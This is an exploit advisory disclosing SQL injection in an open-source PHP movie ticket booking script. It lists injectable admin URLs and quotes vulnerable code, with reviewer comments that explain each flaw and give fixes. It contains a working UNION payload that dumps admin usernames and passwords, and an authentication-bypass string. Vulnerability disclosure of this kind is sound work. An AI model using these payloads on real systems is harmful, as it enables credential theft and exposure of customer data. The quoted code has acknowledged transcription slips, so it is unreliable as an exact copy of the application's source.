# Exploit Title: Online Movie Ticket Booking - SQL injection
# Date: 2021-06-04
# Exploit Author: Mostafa Farzaneh
# Vendor Homepage: https://github.com/vydyas
# Software Link: https://github.com/vydyas/Online-Movie-Ticket-Booking-Script-Free
# Tested on: Ubuntu
# Version: 1.00
# This web application interpolates request parameters straight into SQL strings (see the quoted code under PoC), giving SQL injection in the following paths. Every path except agent-login.php sits under /admin/, so whether they are reachable without an admin session depends on access checks that are not shown here — confirm before rating severity:
http://localhost/admin/agent-login.php?username=&password=
http://localhost/admin/get_ticket.php?ticketid=
http://localhost/admin/edit_theatre.php?id=
http://localhost/admin/get_movie.php?loc_id=
http://localhost/admin/get_agents.php?loc_id=
http://localhost/admin/get_movie_timings.php?movie_id=&loc_id=
http://localhost/admin/addmovies_process.php?movie_name=
http://localhost/admin/delete.php?id=
http://localhost/admin/get_customer_booking.php?clocation=&ctheatre=
http://localhost/admin/add_agent_process.php?theatre_name=
# PoC :
- Vulnerable code:
get_customer_booking.php:
// Sink: both $_REQUEST values are concatenated into the query string with no escaping
// or binding. (The assignments are listed below the query in this excerpt; presumably
// they precede it in the original file.) Fix: bind them through a prepared statement,
// e.g. "... where fk_location_id = ? and fk_theater_id = ?" with PDO/mysqli.
$sql = "select * from assign_show where fk_location_id = '$clocation' and fk_theater_id = '$ctheatre'";
$clocation = $_REQUEST['clocation'];
$ctheatre = $_REQUEST['ctheatre'];
add_agent_process.php:
// Sink: $_POST['theatre_name'] is interpolated into the WHERE clause unescaped. Note the
// legacy mysql_* extension (removed in PHP 7.0), so this code only runs on PHP 5.x and
// has no parameter-binding API; the fix is to migrate to mysqli/PDO prepared statements.
$query1 = mysql_query("SELECT * FROM agent WHERE username='$theatre_name' ");
$theatre_name = $_POST['theatre_name'];
delete.php:
// Sink: $_GET['id'] is interpolated into a DELETE statement, so an injected value can
// widen the WHERE clause (e.g. delete every row). A destructive action driven by a GET
// parameter is also a CSRF candidate if no token check exists — not visible here, verify.
// Fix: prepared statement with the id bound as a parameter, and a POST + CSRF token.
$sql = "delete from location where id='$id'";
$id = $_GET['id'];
addmovies_process.php:
// Sink: $_POST['movie_name'] is interpolated into the query unescaped (same pattern as
// add_agent_process.php). Fix: prepared statement with the name bound as a parameter.
$query1 = mysql_query("SELECT * FROM movies WHERE name='$movie_name' ");
$movie_name = $_POST['movie_name'];
get_movie_timings.php:
// Sink: both $_REQUEST values are interpolated unescaped; this is the query the UNION
// payload below targets. Because it is "select *", a UNION injection has to match the
// column count of the theatres table, which is not shown in this advisory.
// Fix: prepared statement binding movie_id and loc_id.
$sql1 = "select * from theatres where movies_id = '$movie_id' and location_id='$loc_id'";
$movie_id = $_REQUEST['movie_id'];
$loc_id = $_REQUEST['loc_id'];
get_agents.php:
// Sink: $loc_id is interpolated in a numeric context with no surrounding quotes, so an
// attacker needs no quote character to break out — quote-escaping helpers such as
// addslashes() or mysql_real_escape_string() would not mitigate this one.
// Fix: cast to int ((int)$loc_id) or bind it as a parameter.
$sql = "SELECT * FROM agent where fk_location_id=$loc_id ";
$loc_id = $_REQUEST['loc_id'];
get_movie.php:
// Sink: $_REQUEST['loc_id'] is interpolated into the WHERE clause unescaped.
// NOTE(review): the leading "$" on "sql" is missing in this excerpt — almost certainly
// a transcription slip in the advisory rather than the application's actual source.
// Fix: prepared statement with loc_id bound as a parameter.
sql = "SELECT movies.name,movies.id,todate FROM assign_show join movies on assign_show.fk_movie_id = movies.id where assign_show.fk_location_id='$loc_id' order by movies.id desc";
$loc_id = $_REQUEST['loc_id'];
edit_theatre.php:
// Sink: $_REQUEST['id'] is interpolated unescaped and the first row of the result is
// fetched directly, which is a convenient target for UNION-based extraction if the row
// is rendered into the edit form (rendering is not shown here).
// NOTE(review): the leading "$" on "query" is missing in this excerpt (transcription).
// Fix: prepared statement with id bound as a parameter.
query = mysql_fetch_array(mysql_query("SELECT * FROM theatres WHERE id='$id'"));
$id = $_REQUEST['id'];
agent-login.php:
// Sink: username and password are interpolated into the login query. Beyond data
// extraction, a crafted username such as `' OR '1'='1` can make the WHERE clause match
// without valid credentials (classic authentication bypass) — confirm against the
// loginagent() wrapper, whose definition is not shown. The query also compares the raw
// password value, which suggests cleartext password storage unless hashing happens
// before this point (not visible in the excerpt).
// Fix: prepared statement, plus password_hash()/password_verify() for credentials.
$query = mysql_query("select * from agent where username='$username' and password='$password'")
// The loginagent() call appears twice in the advisory's excerpt as quoted; its
// definition and the semicolons/return handling are not shown.
loginagent($username, $password)
loginagent($username, $password)
get_ticket.php:
// Sink: a request parameter is interpolated into the WHERE clause unescaped; the query
// returns customer PII (name, email, mobile), so a successful injection exposes customer
// records. NOTE(review): the query uses $ticket while the assignment below populates
// $ticketid — either a transcription mismatch in the advisory or the injectable variable
// is assigned elsewhere; verify the actual parameter name before testing.
// Fix: prepared statement with the ticket id bound as a parameter.
$sql1 = "select customer_details.cust_id,customer_details.name,customer_details.email,customer_details.mobile from customer_booking join customer_details on customer_booking.fk_cust_id = customer_details.cust_id where fk_cust_id = '$ticket' group by fk_cust_id";
$ticketid = $_REQUEST['ticketid'];
- Payload (path corrected to match the get_movie_timings.php entry above; the UNION must match the column count of the theatres table, and the `admin` table/column names are not shown in the quoted code — confirm both, e.g. with `ORDER BY n` probing, before relying on this):
http://localhost/admin/get_movie_timings.php?movie_id='+union+select+1,group_concat(username,':',password)+from+admin--+-&loc_id=
*********************************************************
#Discovered by: Mostafa Farzaneh
#Telegram: @pyweb_security
*********************************************************